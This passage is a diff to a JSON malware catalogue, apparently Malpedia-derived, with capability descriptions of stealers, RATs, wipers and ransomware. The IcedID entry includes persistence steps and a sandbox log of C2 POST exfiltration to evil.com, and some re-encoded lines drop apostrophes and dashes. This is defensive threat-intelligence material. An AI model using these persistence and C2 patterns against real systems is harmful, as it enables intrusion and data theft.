"description": "According to CyberArk, this malware is used to steal sensitive information, including login credentials, credit card information, cryptocurrency wallets and browser information from applications such as WinSCP, Discord, Google Chrome, Electrum, etc. It does all that by implementing a different approach than other stealers (well cover it later). Additionally, FickerStealer can function as a File Grabber and collect additional files from the compromised machine, and it can act as a Downloader to download and execute several second-stage malware.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.fickerstealer",
@ -25936,7 +25936,7 @@
"value": "FiveHands"
},
{
"description": "According to PICUS, Flagpro is malware that collects information from the victim and executes commands in the victim\u2019s environment. It targets Japan, Taiwan, and English-speaking countries. When a victim is infected with Flagpro malware, the malware can do the following:\r\n\r\nDownload and execute a tool\r\nExecute OS commands and send results\r\nCollect and send Windows authentication information",
"description": "According to PICUS, Flagpro is malware that collects information from the victim and executes commands in the victims environment. It targets Japan, Taiwan, and English-speaking countries. When a victim is infected with Flagpro malware, the malware can do the following:\r\n\r\nDownload and execute a tool\r\nExecute OS commands and send results\r\nCollect and send Windows authentication information",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.flagpro",
@ -26508,7 +26508,7 @@
"value": "FusionDrive"
},
{
"description": "FuwuqiDrama is a server-side RAT. It manages client connections by utilizing I/O completion ports, which are usually used in high-performance server applications as an elegant solution to manage many clients at once.\r\n\r\nIt contains two distinguishing hardcoded lists.\r\n\r\nFirst is a list of ~50 video files of South Korean TV series, having their titles translated to Mandarin Chinese, but encoded in the form of Pinyin romanization. That means the sounds are spelled in Latin alphabet without tone marks, for example meiyounihuobuxiaqu.avi represents Can't Live Without You (a K-drama from 2012) or wulalafufu.avi translates to Ohlala Couple (also from 2012). \r\n\r\nSecond is the list of the following corporations: NVIDIA, Amazon, Intel, Skype, 360Safe, Rising, Tencent, Mozilla, Adobe, Yahoo, Google. The same list is contained in some of the WannaCryptor samples.\r\n\r\nFuwuqiDrama stores its configuration in the INI file data\\package_con_x86.cat. It contains the port number and a bot identifier, all within a single section called Fuwuqi \u2013 the romanized Chinese word for server.\r\n",
"description": "FuwuqiDrama is a server-side RAT. It manages client connections by utilizing I/O completion ports, which are usually used in high-performance server applications as an elegant solution to manage many clients at once.\r\n\r\nIt contains two distinguishing hardcoded lists.\r\n\r\nFirst is a list of ~50 video files of South Korean TV series, having their titles translated to Mandarin Chinese, but encoded in the form of Pinyin romanization. That means the sounds are spelled in Latin alphabet without tone marks, for example meiyounihuobuxiaqu.avi represents Can't Live Without You (a K-drama from 2012) or wulalafufu.avi translates to Ohlala Couple (also from 2012). \r\n\r\nSecond is the list of the following corporations: NVIDIA, Amazon, Intel, Skype, 360Safe, Rising, Tencent, Mozilla, Adobe, Yahoo, Google. The same list is contained in some of the WannaCryptor samples.\r\n\r\nFuwuqiDrama stores its configuration in the INI file data\\package_con_x86.cat. It contains the port number and a bot identifier, all within a single section called Fuwuqi the romanized Chinese word for server.\r\n",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.fuwuqidrama",
@ -26645,7 +26645,7 @@
"value": "Gamotrol"
},
{
"description": "GandCrab was a Ransomware-as-a-Service (RaaS) emerged in January 28, 2018, managed by a criminal organization known to be confident and vocal, while running a rapidly evolving ransomware campaign. Through their aggressive, albeit unusual, marketing strategies and constant recruitment of affiliates, they were able to globally distribute a high volume of their malware.\r\n\r\nIn a surprising announcement on May 31, 2019, the GandCrab\u2019s operators posted on a dark web forum, announced the end of a little more than a year of ransomware operations, citing staggering profit figures. However, If there\u2019s one thing that sets these threat actors apart from other groups, it is that they are unpredictable; so there is always the possibility that they might re-surface in one form or another.",
"description": "GandCrab was a Ransomware-as-a-Service (RaaS) emerged in January 28, 2018, managed by a criminal organization known to be confident and vocal, while running a rapidly evolving ransomware campaign. Through their aggressive, albeit unusual, marketing strategies and constant recruitment of affiliates, they were able to globally distribute a high volume of their malware.\r\n\r\nIn a surprising announcement on May 31, 2019, the GandCrabs operators posted on a dark web forum, announced the end of a little more than a year of ransomware operations, citing staggering profit figures. However, If theres one thing that sets these threat actors apart from other groups, it is that they are unpredictable; so there is always the possibility that they might re-surface in one form or another.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab",
@ -27074,7 +27074,7 @@
"value": "GhostAdmin"
},
{
"description": "According to Security Ninja, Gh0st RAT (Remote Access Terminal) is a trojan \u201cRemote Access Tool\u201d used on Windows platforms, and has been used to hack into some of the most sensitive computer networks on Earth.\r\n\r\nBelow is a list of Gh0st RAT capabilities.\r\nTake full control of the remote screen on the infected bot.\r\nProvide real time as well as offline keystroke logging.\r\nProvide live feed of webcam, microphone of infected host.\r\nDownload remote binaries on the infected remote host.\r\nTake control of remote shutdown and reboot of host.\r\nDisable infected computer remote pointer and keyboard input.\r\nEnter into shell of remote infected host with full control.\r\nProvide a list of all the active processes.\r\nClear all existing SSDT of all existing hooks.",
"description": "According to Security Ninja, Gh0st RAT (Remote Access Terminal) is a trojan “Remote Access Tool” used on Windows platforms, and has been used to hack into some of the most sensitive computer networks on Earth.\r\n\r\nBelow is a list of Gh0st RAT capabilities.\r\nTake full control of the remote screen on the infected bot.\r\nProvide real time as well as offline keystroke logging.\r\nProvide live feed of webcam, microphone of infected host.\r\nDownload remote binaries on the infected remote host.\r\nTake control of remote shutdown and reboot of host.\r\nDisable infected computer remote pointer and keyboard input.\r\nEnter into shell of remote infected host with full control.\r\nProvide a list of all the active processes.\r\nClear all existing SSDT of all existing hooks.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat",
@ -27534,7 +27534,7 @@
"value": "GoldenHelper"
},
{
"description": "According securityweek, GoldenSpy, the malware was observed as part of a campaign that supposedly started in April 2020, but some of the identified samples suggest the threat has been around since at least December 2016.\r\n\r\nOne of the compromised organizations, a global technology vendor that conducts government business in the US, Australia and UK, and which recently opened offices in China, became infected after installing \u201cIntelligent Tax,\u201d a piece of software from the Golden Tax Department of Aisino Corporation, which a local bank required for paying local taxes.\r\n\r\nAlthough it worked as advertised, the software was found to install a hidden backdoor to provide remote operators with the possibility to execute Windows commands or upload and run files.",
"description": "According securityweek, GoldenSpy, the malware was observed as part of a campaign that supposedly started in April 2020, but some of the identified samples suggest the threat has been around since at least December 2016.\r\n\r\nOne of the compromised organizations, a global technology vendor that conducts government business in the US, Australia and UK, and which recently opened offices in China, became infected after installing “Intelligent Tax,” a piece of software from the Golden Tax Department of Aisino Corporation, which a local bank required for paying local taxes.\r\n\r\nAlthough it worked as advertised, the software was found to install a hidden backdoor to provide remote operators with the possibility to execute Windows commands or upload and run files.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenspy",
@ -27579,7 +27579,7 @@
"value": "GoldMax"
},
{
"description": "GoldDragon was a second-stage backdoor which established a permanent presence on the victim\u2019s system once the first-stage, file-less, PowerShell-based attack leveraging steganography was executed. The initial attack was observed first in December 2017, when a Korean-language spear phishing campaing targeted organizations linked with Pyeongchang Winter Olympics 2018. GoldDragon was delivered once the attacker had gained an initial foothold in the targeted environment.\r\n\r\nThe malware was capable of a basic reconnaissance, data exfiltration and downloading of additional components from its C&C server. ",
"description": "GoldDragon was a second-stage backdoor which established a permanent presence on the victims system once the first-stage, file-less, PowerShell-based attack leveraging steganography was executed. The initial attack was observed first in December 2017, when a Korean-language spear phishing campaing targeted organizations linked with Pyeongchang Winter Olympics 2018. GoldDragon was delivered once the attacker had gained an initial foothold in the targeted environment.\r\n\r\nThe malware was capable of a basic reconnaissance, data exfiltration and downloading of additional components from its C&C server. ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon",
@ -27964,7 +27964,7 @@
"value": "GraphicalNeutrino"
},
{
"description": "According to Symantec, Graphican is an evolution of the known APT15 backdoor Ketrican, which itself was based on a previous malware - BS2005 - also used by APT15. Graphican has the same basic functionality as Ketrican, with the difference between them being Graphican\u2019s use of the Microsoft Graph API and OneDrive to obtain its command-and-control (C&C) infrastructure.",
"description": "According to Symantec, Graphican is an evolution of the known APT15 backdoor Ketrican, which itself was based on a previous malware - BS2005 - also used by APT15. Graphican has the same basic functionality as Ketrican, with the difference between them being Graphicans use of the Microsoft Graph API and OneDrive to obtain its command-and-control (C&C) infrastructure.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.graphican",
@ -28043,7 +28043,7 @@
"value": "GraphSteel"
},
{
"description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card\u2019s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system\u2019s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.",
"description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a cards magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale systems memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos",
@ -29787,7 +29787,7 @@
"value": "Icarus"
},
{
"description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If \u201c/i\u201d is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If \u201c/I\u201d is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2",
"description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid",
@ -30026,7 +30026,7 @@
"value": "win.icexloader"
},
{
"description": "The ICE IX bot is a banking trojan derived of the Zeus botnet because it uses significant parts of Zeus\u2019s source code. ICE IX communicates using the HTTP protocol, so it can be considered to be a third-generation botnet. While it has been used for a variety of purposes, a primary threat of ICE IX comes from its manipulation of banking operations on compromised machines. As with any bot, execution of the bot results in establishing a master-slave relationship between the botmaster and the compromised computer.",
"description": "The ICE IX bot is a banking trojan derived of the Zeus botnet because it uses significant parts of Zeuss source code. ICE IX communicates using the HTTP protocol, so it can be considered to be a third-generation botnet. While it has been used for a variety of purposes, a primary threat of ICE IX comes from its manipulation of banking operations on compromised machines. As with any bot, execution of the bot results in establishing a master-slave relationship between the botmaster and the compromised computer.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix",
@ -30087,7 +30087,7 @@
"value": "IcyHeart"
},
{
"description": "According to Rapid7, this is a loader first spotted in July 2023. It implements several evasion techniques including Process Doppelg\u00e4nging, DLL Search Order Hijacking, and Heaven's Gate. IDAT loader got its name as the threat actor stores the malicious payload in the IDAT chunk of PNG file format.",
"description": "According to Rapid7, this is a loader first spotted in July 2023. It implements several evasion techniques including Process Doppelgänging, DLL Search Order Hijacking, and Heaven's Gate. IDAT loader got its name as the threat actor stores the malicious payload in the IDAT chunk of PNG file format.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.idat_loader",
@ -30248,7 +30248,7 @@
"value": "Industrial Spy"
},
{
"description": "Industroyer is a malware framework considered to have been used in the cyberattack on Ukraine\u2019s power grid on December 17, 2016. The attack cut a fifth of Kiev, the capital, off power for one hour. It is the first ever known malware specifically designed to attack electrical grids.",
"description": "Industroyer is a malware framework considered to have been used in the cyberattack on Ukraines power grid on December 17, 2016. The attack cut a fifth of Kiev, the capital, off power for one hour. It is the first ever known malware specifically designed to attack electrical grids.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer",
@ -30480,7 +30480,7 @@
"value": "Ironcat"
},
{
"description": " IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.\r\n The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user\u2019s Startup folder.",
"description": " IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.\r\n The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current users Startup folder.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo",
@ -30509,7 +30509,7 @@
"value": "IronNetInjector"
},
{
"description": "According to Recorded Future, IsaacWiper is a destructive malware that overwrites all physical disks and logical volumes on a victim\u2019s machine.",
"description": "According to Recorded Future, IsaacWiper is a destructive malware that overwrites all physical disks and logical volumes on a victims machine.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.isaacwiper",
@ -30877,7 +30877,7 @@
"value": "Janeleiro"
},
{
"description": "Jason is a graphic tool implemented to perform Microsoft exchange account brute-force in order to \u201charvest\u201d the highest possible emails and accounts information. Distributed in a ZIP container the interface is quite intuitive: the Microsoft exchange address and its version shall be provided. Three brute-force methods could be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password list can be selected and threads number should be provided in order to optimize the attack balance.",
"description": "Jason is a graphic tool implemented to perform Microsoft exchange account brute-force in order to “harvest” the highest possible emails and accounts information. Distributed in a ZIP container the interface is quite intuitive: the Microsoft exchange address and its version shall be provided. Three brute-force methods could be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password list can be selected and threads number should be provided in order to optimize the attack balance.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.jason",
@ -30936,7 +30936,7 @@
"value": "Jeno"
},
{
"description": "JessieConTea is a remote access trojan that uses HTTP(S) for communication. It supports around 30 commands that include operations on the victim\u2019s filesystem, basic process management, file exfiltration (both plain and zipped), and the download and execution of additional tools from the attacker\u2019s arsenal. The commands are indexed by 32-bit integers, starting with the value 0x60D49D97.\r\n\r\nThe malware was delivered in-the-wild via trojanized applications like DeFi Wallet or Citrix Workspace.\r\n\r\nJessieConTea generates POST parameters with a specific parameter name, jsessid, from which the initial part of its name is derived. Also, it contains a specific RTTI symbol \".?AVCHttpConn@@\", which inspired the second part of the name. It uses RC4 for C&C traffic encryption.\r\n",
"description": "JessieConTea is a remote access trojan that uses HTTP(S) for communication. It supports around 30 commands that include operations on the victims filesystem, basic process management, file exfiltration (both plain and zipped), and the download and execution of additional tools from the attackers arsenal. The commands are indexed by 32-bit integers, starting with the value 0x60D49D97.\r\n\r\nThe malware was delivered in-the-wild via trojanized applications like DeFi Wallet or Citrix Workspace.\r\n\r\nJessieConTea generates POST parameters with a specific parameter name, jsessid, from which the initial part of its name is derived. Also, it contains a specific RTTI symbol \".?AVCHttpConn@@\", which inspired the second part of the name. It uses RC4 for C&C traffic encryption.\r\n",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.jessiecontea",
@ -31584,7 +31584,7 @@
"value": "Khonsari"
},
{
"description": "According to Unit42, KHRAT is a Trojan that registers victims using their infected machine\u2019s username, system language and local IP address. KHRAT provides the threat actors typical RAT features and access to the victim system, including keylogging, screenshot capabilities, remote shell access and so on.",
"description": "According to Unit42, KHRAT is a Trojan that registers victims using their infected machines username, system language and local IP address. KHRAT provides the threat actors typical RAT features and access to the victim system, including keylogging, screenshot capabilities, remote shell access and so on.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat",
@ -31631,7 +31631,7 @@
"value": "KillAV"
},
{
"description": "KillDisk is a generic detection name used by ESET to refer to destructive malware with disk wiping capabilities, such as damaging boot sectors and overwriting then deleting (system) files, followed by a reboot to render the machine unusable. Although all KillDisk malware has similar functionality, as a generic detection, individual samples do not necessarily have strong code similarities or relationships. Such generic malware detections usually have many \u201csub-families\u201d, distinguished by the detection suffix (e.g. KillDisk.NBO, KillDisk.NCV, and KillDisk.NCX). Sub-family variants that do have strong code similarities, are sometimes seen in separate cyberattacks and thus can help researchers make connections between them. ",
"description": "KillDisk is a generic detection name used by ESET to refer to destructive malware with disk wiping capabilities, such as damaging boot sectors and overwriting then deleting (system) files, followed by a reboot to render the machine unusable. Although all KillDisk malware has similar functionality, as a generic detection, individual samples do not necessarily have strong code similarities or relationships. Such generic malware detections usually have many “sub-families”, distinguished by the detection suffix (e.g. KillDisk.NBO, KillDisk.NCV, and KillDisk.NCX). Sub-family variants that do have strong code similarities, are sometimes seen in separate cyberattacks and thus can help researchers make connections between them. ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk",
@ -32320,7 +32320,7 @@
"value": "LaplasClipper"
},
{
"description": "FireEye describes this malware as a highly obfuscated bot that has been in the wild since mid-2013. It has managed to leave hardly any traces on the Internet, is capable of watching its victims without ever being noticed, and can even corrupt a hard disk, thus making a PC useless.\r\n\r\nUsing Dynamic Threat Intelligence, they have observed multiple campaigns targeting multiple industries in the United States, United Kingdom, South Korea, Brazil, United Arab Emirates, Singapore, Canada, Peru and Poland \u2013 primarily in the financial services and insurance sectors. Although the infection strategy is not new, the final payload dropped \u2013 which they named LATENTBOT \u2013 caught attention since it implements several layers of obfuscation, a unique exfiltration mechanism, and has been very successful at infecting multiple organizations.",
"description": "FireEye describes this malware as a highly obfuscated bot that has been in the wild since mid-2013. It has managed to leave hardly any traces on the Internet, is capable of watching its victims without ever being noticed, and can even corrupt a hard disk, thus making a PC useless.\r\n\r\nUsing Dynamic Threat Intelligence, they have observed multiple campaigns targeting multiple industries in the United States, United Kingdom, South Korea, Brazil, United Arab Emirates, Singapore, Canada, Peru and Poland primarily in the financial services and insurance sectors. Although the infection strategy is not new, the final payload dropped which they named LATENTBOT caught attention since it implements several layers of obfuscation, a unique exfiltration mechanism, and has been very successful at infecting multiple organizations.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot",
@ -32618,7 +32618,7 @@
"value": "LightNeuron"
},
{
"description": "Lightning stealer can target 30+ Firefox and Chromium-based browsers and steal crypto wallets, Telegram data, Discord tokens, and Steam user\u2019s data. Unlike other info stealers, Lightning Stealer stores all the stolen data in the JSON format for exfiltration. ",
"description": "Lightning stealer can target 30+ Firefox and Chromium-based browsers and steal crypto wallets, Telegram data, Discord tokens, and Steam users data. Unlike other info stealers, Lightning Stealer stores all the stolen data in the JSON format for exfiltration. ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lightning_stealer",
@ -33111,7 +33111,7 @@
"value": "LockPOS"
},
{
"description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as \u201cTrojan.Nymeria\u201d, although the connection is not well-documented.",
"description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.loda",
@ -33236,7 +33236,7 @@
"value": "LokiLocker"
},
{
"description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of \u2018-u\u2019 that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: \u201cB7E1C2CC98066B250DDB2123\u201c.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: \u201c%APPDATA%\\ C98066\\\u201d.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: \u201c.exe,\u201d \u201c.lck,\u201d \u201c.hdb\u201d and \u201c.kdb.\u201d They will be named after characters 13 thru 18 of the Mutex. For example: \u201c6B250D.\u201d Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically \u201cckav.ru\u201d. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot 